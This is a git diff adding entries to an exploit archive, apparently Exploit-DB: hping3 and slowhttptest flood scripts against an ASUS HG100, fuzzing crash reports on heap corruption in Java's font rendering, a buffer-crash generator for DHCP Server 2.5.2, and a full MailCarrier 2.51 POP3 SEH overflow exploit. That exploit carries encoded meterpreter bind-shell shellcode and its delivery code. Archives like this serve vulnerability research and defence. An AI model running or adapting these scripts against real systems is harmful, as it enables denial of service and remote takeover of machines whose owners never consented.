diff --git a/exploits/hardware/dos/46720.sh b/exploits/hardware/dos/46720.sh new file mode 100755 index 000000000..83f3a31a7 --- /dev/null +++ b/exploits/hardware/dos/46720.sh @@ -0,0 +1,34 @@ +# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS +# Date: 2019-04-14 # Exploit Author: YinT Wang; +# Vendor Homepage: www.asus.com +# Version: Hardware version: HG100 、Firmware version: 1.05.12 +# Tested on: Currnet 1.05.12 +# CVE : CVE-2018-11492 + +1. Description +The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492). + +2.Proof of Concept +Just Execute the following script in kali which could crash the devices + + 1. IPv4 packet and in result of devices crash.which written in linux script. + + #needed to co-operate with hping3 tool + #with the time period at least 220s which could cause web server of HG100 devices crash + #!/bin/bash + read -p "enter the ip of HG100 here " url + hping3 -V -c 10000 -S -w 64 --flood --rand-source $url + sleep 220 + echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s" + exit 0 + + 2.Slowhttp test and caused the devices crash.which written in linux script. + + #needed to co-operate with slowhttptest tool + #with the time period 600s which could cause web server of HG100 devices crash + #!/bin/bash + read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url + slowhttptest -H -R -c 10000 -l 600 -u $url + sleep 600 + echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s" + exit 0 \ No newline at end of file diff --git a/exploits/multiple/dos/46722.txt b/exploits/multiple/dos/46722.txt new file mode 100644 index 000000000..32bb41438 --- /dev/null +++ b/exploits/multiple/dos/46722.txt @@ -0,0 +1,99 @@ +A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library. It manifests itself in the form of the following (or similar) crash: + +--- cut --- + $ bin/java -cp . DisplaySfntFont test.ttf + Iteration (0,0) + *** Error in `bin/java': munmap_chunk(): invalid pointer: 0x00007f5cf82a6490 *** + ======= Backtrace: ========= + /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f5cfd492bcb] + /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f5cfd498f96] + jre/8u202/lib/amd64/libt2k.so(+0x5443d)[0x7f5cd563343d] + jre/8u202/lib/amd64/libt2k.so(+0x47b95)[0x7f5cd5626b95] + jre/8u202/lib/amd64/libt2k.so(Java_sun_font_T2KFontScaler_getGlyphImageNative+0xe5)[0x7f5cd560fa25] + [0x7f5ce83a06c7] + ======= Memory map: ======== + 00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java + 00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java + 00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java + 02573000-02594000 rw-p 00000000 00:00 0 [heap] + 3d1a00000-3fba00000 rw-p 00000000 00:00 0 + 3fba00000-670900000 ---p 00000000 00:00 0 + 670900000-685900000 rw-p 00000000 00:00 0 + 685900000-7c0000000 ---p 00000000 00:00 0 + 7c0000000-7c00c0000 rw-p 00000000 00:00 0 + 7c00c0000-800000000 ---p 00000000 00:00 0 + [...] + Aborted +--- cut --- + +The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered under Valgrind (many out-of-bounds reads and writes in sc_FindExtrema4 were ommitted in the log below): + +--- cut --- + $ valgrind bin/java -cp . DisplaySfntFont test.ttf + [...] + ==211051== Invalid write of size 8 + ==211051== at 0x415B30EE: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x7B8D6C6: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7D2BC: ??? + ==211051== by 0x7B7CA8F: ??? + ==211051== Address 0x3f6f1d38 is 19,160 bytes inside a block of size 19,166 alloc'd + ==211051== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299) + ==211051== by 0x415D84A4: tsi_AllocMem (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415B2664: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so) + ==211051== by 0x7B8D6C6: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + ==211051== by 0x7B7CDCF: ??? + [...] +--- cut --- + +or with AFL's libdislocator under gdb: + +--- cut --- + Thread 2 "java" received signal SIGSEGV, Segmentation fault. + [----------------------------------registers-----------------------------------] + [...] + R11: 0x7fffb5d89e82 --> 0x0 + [...] + EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow) + [-------------------------------------code-------------------------------------] + 0x7fffb63be972 : lea r11,[r12+r9*2] + 0x7fffb63be976 : je 0x7fffb63bea30 + 0x7fffb63be97c : lea r9d,[r8-0x1] + => 0x7fffb63be980 : add WORD PTR [r11],0x1 + 0x7fffb63be985 : test r9d,r9d + 0x7fffb63be988 : je 0x7fffb63bea30 + 0x7fffb63be98e : add WORD PTR [r11+0x2],0x1 + 0x7fffb63be994 : cmp r8d,0x2 + [...] +--- cut --- + +On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process: + +--- cut --- + (244c.1660): Access violation - code c0000005 (first chance) + First chance exceptions are reported before any exception handling. + This exception may be expected and handled. + *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Java\jre1.8.0_202\bin\server\jvm.dll - + jvm+0x8598: + 00000000`61158598 c7040801000000 mov dword ptr [rax+rcx],1 ds:00000000`05860280=00000001 +--- cut --- + +In total, we have encountered crashes in the t2k!sc_FindExtrema4 function in three different locations, in two cases while adding 1 to an invalid memory location, and in one case while adding 2 to an out-of-bounds address. Attached with this report are three mutated testcases (one for each crashing code location), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46722.zip \ No newline at end of file diff --git a/exploits/multiple/dos/46723.txt b/exploits/multiple/dos/46723.txt new file mode 100644 index 000000000..2f811c8ac --- /dev/null +++ b/exploits/multiple/dos/46723.txt @@ -0,0 +1,115 @@ +A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash: + +--- cut --- + $ bin/java -cp . DisplaySfntFont test.ttf + Iteration (0,0) + # + # A fatal error has been detected by the Java Runtime Environment: + # + # SIGSEGV (0xb) at pc=0x00007f7285b39824, pid=234398, tid=0x00007f7286683700 + # + # JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08) + # Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops) + # Problematic frame: + # C [libc.so.6+0x77824]# [ timer expired, abort... ] + Aborted +--- cut --- + +The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered with the MALLOC_CHECK_=3 environment variable: + +--- cut --- + $ MALLOC_CHECK_=3 bin/java -cp . DisplaySfntFont test.ttf + Iteration (0,0) + *** Error in `bin/java': free(): invalid pointer: 0x0000000002876320 *** + ======= Backtrace: ========= + /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f84185edbcb] + /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f84185f3f96] + jre/8u202/lib/amd64/libfontmanager.so(+0x1d2b2)[0x7f83ddc672b2] + jre/8u202/lib/amd64/libfontmanager.so(+0x27ff4)[0x7f83ddc71ff4] + jre/8u202/lib/amd64/libfontmanager.so(+0x866f)[0x7f83ddc5266f] + jre/8u202/lib/amd64/libfontmanager.so(Java_sun_font_SunLayoutEngine_nativeLayout+0x230)[0x7f83ddc78990] + [0x7f84076306c7] + ======= Memory map: ======== + 00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java + 00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java + 00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java + 023ba000-028d9000 rw-p 00000000 00:00 0 [heap] + 3d1a00000-3fba00000 rw-p 00000000 00:00 0 + 3fba00000-670900000 ---p 00000000 00:00 0 + 670900000-685900000 rw-p 00000000 00:00 0 + 685900000-7c0000000 ---p 00000000 00:00 0 + 7c0000000-7c00c0000 rw-p 00000000 00:00 0 + 7c00c0000-800000000 ---p 00000000 00:00 0 + [...] +--- cut --- + +... under Valgrind: + +--- cut --- + $ valgrind bin/java -cp . DisplaySfntFont test.ttf + [...] + ==245623== Invalid write of size 2 + ==245623== at 0x40BF2750: GlyphIterator::setCurrGlyphID(unsigned short) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0C089: SingleSubstitutionFormat1Subtable::process(LEReferenceTo const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0C4A4: SingleSubstitutionSubtable::process(LEReferenceTo const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BF47E5: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C02FBA: LookupProcessor::applySingleLookup(unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BEBC9C: ContextualSubstitutionBase::applySubstitutionLookups(LookupProcessor const*, LEReferenceToArrayOf const&, unsigned short, GlyphIterator*, LEFontInstance const*, int, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BEE766: ChainingContextualSubstitutionFormat3Subtable::process(LETableReference const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BEE8E3: ChainingContextualSubstitutionSubtable::process(LEReferenceTo const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BF475B: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C02EAB: LookupProcessor::process(LEGlyphStorage&, GlyphPositionAdjustments*, char, LEReferenceTo const&, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== Address 0x3f68a55c is 4 bytes before a block of size 104 alloc'd + ==245623== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299) + ==245623== by 0x40BFD4CF: LEGlyphStorage::allocateGlyphArray(int, char, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BE875A: ArabicOpenTypeLayoutEngine::characterProcessing(unsigned short const*, int, int, int, char, unsigned short*&, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0815F: OpenTypeLayoutEngine::computeGlyphs(unsigned short const*, int, int, int, char, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40BFE55D: LayoutEngine::layoutChars(unsigned short const*, int, int, int, char, float, float, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so) + ==245623== by 0x40C0E91F: Java_sun_font_SunLayoutEngine_nativeLayout (in jre/8u202/lib/amd64/libfontmanager.so) + [...] +--- cut --- + +or with AFL's libdislocator under gdb: + +--- cut --- +Continuing. + Iteration (0,0) + *** [AFL] bad allocator canary on free() *** + + Thread 2 "java" received signal SIGABRT, Aborted. + [...] + Stopped reason: SIGABRT + __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 + 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. + gdb$ where + #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 + #1 0x00007ffff72313fa in __GI_abort () at abort.c:89 + #2 0x00007ffff7bd651c in free () from libdislocator/libdislocator.so + #3 0x00007fffb892f2b2 in LEGlyphStorage::reset() () from jre/8u202/lib/amd64/libfontmanager.so + #4 0x00007fffb8939ff4 in OpenTypeLayoutEngine::~OpenTypeLayoutEngine() () + from jre/8u202/lib/amd64/libfontmanager.so + #5 0x00007fffb891a66f in ArabicOpenTypeLayoutEngine::~ArabicOpenTypeLayoutEngine() () + from jre/8u202/lib/amd64/libfontmanager.so + #6 0x00007fffb8940990 in Java_sun_font_SunLayoutEngine_nativeLayout () + from jre/8u202/lib/amd64/libfontmanager.so + #7 0x00007fffe5e376c7 in ?? () + #8 0x0000000000000000 in ?? () +--- cut --- + +On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process: + +--- cut --- + (1184.4c60): Access violation - code c0000005 (first chance) + First chance exceptions are reported before any exception handling. + This exception may be expected and handled. + fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x14bf: + 00007ffa`0d6291bf 428124810000ffff and dword ptr [rcx+r8*4],0FFFF0000h ds:00000000`39663ffc=???????? +--- cut --- + +We have encountered crashes in the libfontmanager!GlyphIterator::setCurrGlyphID function while trying to write before and after a heap allocation. Attached with this report are two mutated testcases (for the buffer under- and overflow), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46723.zip \ No newline at end of file diff --git a/exploits/windows/dos/46721.py b/exploits/windows/dos/46721.py new file mode 100755 index 000000000..6eb128654 --- /dev/null +++ b/exploits/windows/dos/46721.py @@ -0,0 +1,23 @@ +#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-04-16 +#Vendor Homepage: http://www.dhcpserver.de/cms/ +#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments +#Tested Version: 2.5.2 +#Tested on: Windows 7 x32 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: DHCPSRV_2.5.2.py +#2.- Open dhcp.txt and copy content to clipboard +#2.- Open dhcpwiz.exe +#3.- Click Next +#4.- In Network Interface cards Select "Local Area Connection" and click on Next +#5.- In Supported Protocols click on Next +#6.- In Configuring DHCP for Interface Select "DHCP Options" +#7.- Select "Bootfile" field and Paste ClipBoard +#8.- Crashed + +cod = "\x41" * 6000 +f = open('dhcp.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/remote/46719.py b/exploits/windows/remote/46719.py new file mode 100755 index 000000000..e763eedb3 --- /dev/null +++ b/exploits/windows/remote/46719.py @@ -0,0 +1,88 @@ +#!/usr/bin/python +# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3) +# Date: 16/04/2019 +# Exploit Author: Dino Covotsos - Telspace Systems +# Vendor Homepage: https://www.tabslab.com/ +# Version: 2.51 +# Software Link: N.A +# Contact: services[@]telspace.co.za +# Twitter: @telspacesystems (Greets to the Telspace Crew) +# Tested on: Windows XP Prof SP3 ENG x86 +# CVE: TBC from Mitre +# Created for the Telspace Internship 2019 - SEH Exploit +# POC +# 1.) Change ip, username, password and port in code +# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine +#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll) +#N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits. +#Crash at 6174 +import sys +import socket +import time + +#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c +shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f" +"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50" +"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63" +"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f" +"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69" +"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72" +"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e" +"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61" +"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33" +"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b" +"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46" +"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53" +"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70" +"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b" +"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c" +"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64" +"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59" +"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b" +"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33" +"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c" +"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33" +"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38" +"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74" +"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a" +"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48" +"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69" +"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59" +"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45" +"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b" +"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71" +"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52" +"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44" +"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79" +"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b" +"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75" +"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43" +"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66" +"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f" +"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67" +"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b" +"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69" +"\x6f\x78\x55\x41\x41") + +buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882) + +print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n" +print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +connect=s.connect(("192.168.0.150", 110)) +print s.recv(1024) +print "[*] Sending USERNAME\r\n" +s.send('USER test' + '\r\n') +print s.recv(1024) +print "[*] Sending PASSWORD\r\n" +s.send('PASS test' + '\r\n') +print s.recv(1024) +s.send('RETR ' + buffer + '\r\n') +s.send('QUIT\r\n') +s.close() +time.sleep(1) +print "[*] Done, check for meterpreter shell on target ip port 443!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 29aa859ef..999951063 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6387,6 +6387,10 @@ id,file,description,date,author,type,platform,port 46708,exploits/windows/dos/46708.py,"PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows, 46709,exploits/windows/dos/46709.py,"PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)",2019-04-16,"Alejandra Sánchez",dos,windows, 46711,exploits/windows/dos/46711.py,"AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC)",2019-04-16,"Mücahit İsmail Aktaş",dos,windows, +46720,exploits/hardware/dos/46720.sh,"ASUS HG100 - Denial of Service",2019-04-17,"YinT Wang",dos,hardware, +46721,exploits/windows/dos/46721.py,"DHCP Server 2.5.2 - Denial of Service (PoC)",2019-04-17,"Victor Mondragón",dos,windows, +46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple, +46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17335,6 +17339,7 @@ id,file,description,date,author,type,platform,port 46700,exploits/windows/remote/46700.py,"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110 46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110 46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware, +46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,